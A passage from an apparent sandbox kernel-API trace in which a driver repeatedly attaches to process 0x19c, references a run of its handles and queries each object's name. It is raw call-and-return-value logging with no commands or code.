Process=0xffffd000b1b8e388) returned 0x0 [0264.832] PsAcquireProcessExitSynchronization () returned 0x0 [0264.832] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.832] ObReferenceObjectByHandle (in: Handle=0x3dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a269d60, HandleInformation=0x0) returned 0x0 [0264.832] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.832] PsReleaseProcessExitSynchronization () returned 0x2 [0264.832] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28086 [0264.832] ObQueryNameString (in: Object=0xffffc0014a269d60, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.832] ObfDereferenceObject (Object=0xffffc0014a269d60) returned 0x8000 [0264.832] IoCompleteRequest () returned 0x0 [0264.832] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.832] PsAcquireProcessExitSynchronization () returned 0x0 [0264.832] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.832] ObReferenceObjectByHandle (in: Handle=0x3ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148813100, HandleInformation=0x0) returned 0x0 [0264.832] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.832] PsReleaseProcessExitSynchronization () returned 0x2 [0264.832] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28085 [0264.832] ObQueryNameString (in: Object=0xffffc00148813100, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.832] ObfDereferenceObject (Object=0xffffc00148813100) returned 0x8000 [0264.832] IoCompleteRequest () returned 0x0 [0264.832] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.832] PsAcquireProcessExitSynchronization () returned 0x0 [0264.832] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.832] ObReferenceObjectByHandle (in: Handle=0x3f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a268e70, HandleInformation=0x0) returned 0x0 [0264.832] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.832] PsReleaseProcessExitSynchronization () returned 0x2 [0264.832] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28084 [0264.832] ObQueryNameString (in: Object=0xffffc0014a268e70, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.832] ObfDereferenceObject (Object=0xffffc0014a268e70) returned 0x8000 [0264.832] IoCompleteRequest () returned 0x0 [0264.833] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.833] PsAcquireProcessExitSynchronization () returned 0x0 [0264.833] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.833] ObReferenceObjectByHandle (in: Handle=0x408, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149cec740, HandleInformation=0x0) returned 0x0 [0264.833] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.833] PsReleaseProcessExitSynchronization () returned 0x2 [0264.833] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28083 [0264.833] ObQueryNameString (in: Object=0xffffc00149cec740, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.833] ObfDereferenceObject (Object=0xffffc00149cec740) returned 0x8000 [0264.833] IoCompleteRequest () returned 0x0 [0264.833] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.833] PsAcquireProcessExitSynchronization () returned 0x0 [0264.833] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.833] ObReferenceObjectByHandle (in: Handle=0x418, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149306fc0, HandleInformation=0x0) returned 0x0 [0264.833] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.833] PsReleaseProcessExitSynchronization () returned 0x2 [0264.833] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28082 [0264.833] ObQueryNameString (in: Object=0xffffc00149306fc0, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.833] ObfDereferenceObject (Object=0xffffc00149306fc0) returned 0x8000 [0264.833] IoCompleteRequest () returned 0x0 [0264.833] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.833] PsAcquireProcessExitSynchronization () returned 0x0 [0264.833] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.833] ObReferenceObjectByHandle (in: Handle=0x428, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a215610, HandleInformation=0x0) returned 0x0 [0264.833] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.833] PsReleaseProcessExitSynchronization () returned 0x2 [0264.833] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28081 [0264.833] ObQueryNameString (in: Object=0xffffc0014a215610, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.833] ObfDereferenceObject (Object=0xffffc0014a215610) returned 0x8000 [0264.833] IoCompleteRequest () returned 0x0 [0264.833] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.833] PsAcquireProcessExitSynchronization () returned 0x0 [0264.833] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.833] ObReferenceObjectByHandle (in: Handle=0x430, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149bea2f0, HandleInformation=0x0) returned 0x0 [0264.833] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.833] PsReleaseProcessExitSynchronization () returned 0x2 [0264.833] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28080 [0264.833] ObQueryNameString (in: Object=0xffffc00149bea2f0, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.833] ObfDereferenceObject (Object=0xffffc00149bea2f0) returned 0x8003 [0264.833] IoCompleteRequest () returned 0x0 [0264.833] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.833] PsAcquireProcessExitSynchronization () returned 0x0 [0264.833] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.833] ObReferenceObjectByHandle (in: Handle=0x43c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149e5a610, HandleInformation=0x0) returned 0x0 [0264.833] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.834] PsReleaseProcessExitSynchronization () returned 0x2 [0264.834] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2807f [0264.834] ObQueryNameString (in: Object=0xffffc00149e5a610, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.834] ObfDereferenceObject (Object=0xffffc00149e5a610) returned 0x8000 [0264.834] IoCompleteRequest () returned 0x0 [0264.834] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.834] PsAcquireProcessExitSynchronization () returned 0x0 [0264.834] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.834] ObReferenceObjectByHandle (in: Handle=0x44c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149b00bc0, HandleInformation=0x0) returned 0x0 [0264.834] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.834] PsReleaseProcessExitSynchronization () returned 0x2 [0264.834] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2807e [0264.834] ObQueryNameString (in: Object=0xffffc00149b00bc0, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.834] ObfDereferenceObject (Object=0xffffc00149b00bc0) returned 0x8000 [0264.834] IoCompleteRequest () returned 0x0 [0264.834] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.834] PsAcquireProcessExitSynchronization () returned 0x0 [0264.834] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.834] ObReferenceObjectByHandle (in: Handle=0x460, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149c56300, HandleInformation=0x0) returned 0x0 [0264.834] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.834] PsReleaseProcessExitSynchronization () returned 0x2 [0264.834] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2807d [0264.834] ObQueryNameString (in: Object=0xffffc00149c56300, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.834] ObfDereferenceObject (Object=0xffffc00149c56300) returned 0x8003 [0264.834] IoCompleteRequest () returned 0x0 [0264.834] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.834] PsAcquireProcessExitSynchronization () returned 0x0 [0264.834] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.834] ObReferenceObjectByHandle (in: Handle=0x464, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149ae5340, HandleInformation=0x0) returned 0x0 [0264.834] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.834] PsReleaseProcessExitSynchronization () returned 0x2 [0264.834] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2807c [0264.834] ObQueryNameString (in: Object=0xffffc00149ae5340, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.834] ObfDereferenceObject (Object=0xffffc00149ae5340) returned 0x8000 [0264.834] IoCompleteRequest () returned 0x0 [0264.834] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.834] PsAcquireProcessExitSynchronization () returned 0x0 [0264.834] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.834] ObReferenceObjectByHandle (in: Handle=0x468, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00068a48080, HandleInformation=0x0) returned 0x0 [0264.834] ObfDereferenceObject (Object=0xffffe00068a48080) returned 0x17fe6 [0264.834] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.834] PsReleaseProcessExitSynchronization () returned 0x2 [0264.834] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2807b [0264.834] IoCompleteRequest () returned 0x0 [0264.834] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.835] PsAcquireProcessExitSynchronization () returned 0x0 [0264.835] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.835] ObReferenceObjectByHandle (in: Handle=0x474, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149441860, HandleInformation=0x0) returned 0x0 [0264.835] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.835] PsReleaseProcessExitSynchronization () returned 0x2 [0264.835] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2807a [0264.835] ObQueryNameString (in: Object=0xffffc00149441860, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.835] ObfDereferenceObject (Object=0xffffc00149441860) returned 0x8000 [0264.835] IoCompleteRequest () returned 0x0 [0264.835] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.835] PsAcquireProcessExitSynchronization () returned 0x0 [0264.835] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.835] ObReferenceObjectByHandle (in: Handle=0x484, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a348760, HandleInformation=0x0) returned 0x0 [0264.835] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.835] PsReleaseProcessExitSynchronization () returned 0x2 [0264.835] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28079 [0264.835] ObQueryNameString (in: Object=0xffffc0014a348760, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.835] ObfDereferenceObject (Object=0xffffc0014a348760) returned 0x8000 [0264.835] IoCompleteRequest () returned 0x0 [0264.835] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.835] PsAcquireProcessExitSynchronization () returned 0x0 [0264.835] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.835] ObReferenceObjectByHandle (in: Handle=0x488, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a358fc0, HandleInformation=0x0) returned 0x0 [0264.835] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.835] PsReleaseProcessExitSynchronization () returned 0x2 [0264.835] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28078 [0264.835] ObQueryNameString (in: Object=0xffffc0014a358fc0, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.835] ObfDereferenceObject (Object=0xffffc0014a358fc0) returned 0x8000 [0264.835] IoCompleteRequest () returned 0x0 [0264.835] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.835] PsAcquireProcessExitSynchronization () returned 0x0 [0264.835] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.835] ObReferenceObjectByHandle (in: Handle=0x4a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149feff40, HandleInformation=0x0) returned 0x0 [0264.835] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.835] PsReleaseProcessExitSynchronization () returned 0x2 [0264.835] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28077 [0264.835] ObQueryNameString (in: Object=0xffffc00149feff40, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.835] ObfDereferenceObject (Object=0xffffc00149feff40) returned 0x8000 [0264.835] IoCompleteRequest () returned 0x0 [0264.835] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.835] PsAcquireProcessExitSynchronization () returned 0x0 [0264.835] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.835] ObReferenceObjectByHandle (in: Handle=0x4a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a56a610, HandleInformation=0x0) returned 0x0 [0264.836] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.836] PsReleaseProcessExitSynchronization () returned 0x2 [0264.836] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28076 [0264.836] ObQueryNameString (in: Object=0xffffc0014a56a610, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.836] ObfDereferenceObject (Object=0xffffc0014a56a610) returned 0x8000 [0264.836] IoCompleteRequest () returned 0x0 [0264.836] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.836] PsAcquireProcessExitSynchronization () returned 0x0 [0264.836] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.836] ObReferenceObjectByHandle (in: Handle=0x4ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a0daf70, HandleInformation=0x0) returned 0x0 [0264.836] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.836] PsReleaseProcessExitSynchronization () returned 0x2 [0264.836] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28075 [0264.836] ObQueryNameString (in: Object=0xffffc0014a0daf70, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.836] ObfDereferenceObject (Object=0xffffc0014a0daf70) returned 0x8000 [0264.836] IoCompleteRequest () returned 0x0 [0264.836] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.836] PsAcquireProcessExitSynchronization () returned 0x0 [0264.836] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.836] ObReferenceObjectByHandle (in: Handle=0x4b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001492d5fc0, HandleInformation=0x0) returned 0x0 [0264.836] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.836] PsReleaseProcessExitSynchronization () returned 0x2 [0264.836] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28074 [0264.836] ObQueryNameString (in: Object=0xffffc001492d5fc0, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.836] ObfDereferenceObject (Object=0xffffc001492d5fc0) returned 0x8000 [0264.836] IoCompleteRequest () returned 0x0 [0264.836] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.836] PsAcquireProcessExitSynchronization () returned 0x0 [0264.836] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.836] ObReferenceObjectByHandle (in: Handle=0x4e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a9dbf20, HandleInformation=0x0) returned 0x0 [0264.836] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.836] PsReleaseProcessExitSynchronization () returned 0x2 [0264.836] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28073 [0264.836] ObQueryNameString (in: Object=0xffffc0014a9dbf20, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.836] ObfDereferenceObject (Object=0xffffc0014a9dbf20) returned 0x8000 [0264.836] IoCompleteRequest () returned 0x0 [0264.836] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.836] PsAcquireProcessExitSynchronization () returned 0x0 [0264.836] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.836] ObReferenceObjectByHandle (in: Handle=0x4e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148af22b0, HandleInformation=0x0) returned 0x0 [0264.836] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.836] PsReleaseProcessExitSynchronization () returned 0x2 [0264.836] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28072 [0264.837] ObQueryNameString (in: Object=0xffffc00148af22b0, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.837] ObfDereferenceObject (Object=0xffffc00148af22b0) returned 0x8000 [0264.837] IoCompleteRequest () returned 0x0 [0264.837] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.837] PsAcquireProcessExitSynchronization () returned 0x0 [0264.837] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.837] ObReferenceObjectByHandle (in: Handle=0x4f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a66bf70, HandleInformation=0x0) returned 0x0 [0264.837] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.837] PsReleaseProcessExitSynchronization () returned 0x2 [0264.837] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28071 [0264.837] ObQueryNameString (in: Object=0xffffc0014a66bf70, ObjectNameInfo=0xffffe0006a3b07c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b07c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.837] ObfDereferenceObject (Object=0xffffc0014a66bf70) returned 0x8000 [0264.837] IoCompleteRequest () returned 0x0 [0264.837] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.837] PsAcquireProcessExitSynchronization () returned 0x0 [0264.837] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.837] ObReferenceObjectByHandle (in: Handle=0x4f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a8a3c60, HandleInformation=0x0) returned 0x0 [0264.837] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.837] PsReleaseProcessExitSynchronization () returned 0x2 [0264.837] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28070 [0264.837] ObQueryNameString (in: Object=0xffffc0014a8a3c60, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.837] ObfDereferenceObject (Object=0xffffc0014a8a3c60) returned 0x8000 [0264.837] IoCompleteRequest () returned 0x0 [0264.837] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.837] PsAcquireProcessExitSynchronization () returned 0x0 [0264.837] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.837] ObReferenceObjectByHandle (in: Handle=0x528, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a33f9f0, HandleInformation=0x0) returned 0x0 [0264.837] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.837] PsReleaseProcessExitSynchronization () returned 0x2 [0264.837] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2806f [0264.837] ObQueryNameString (in: 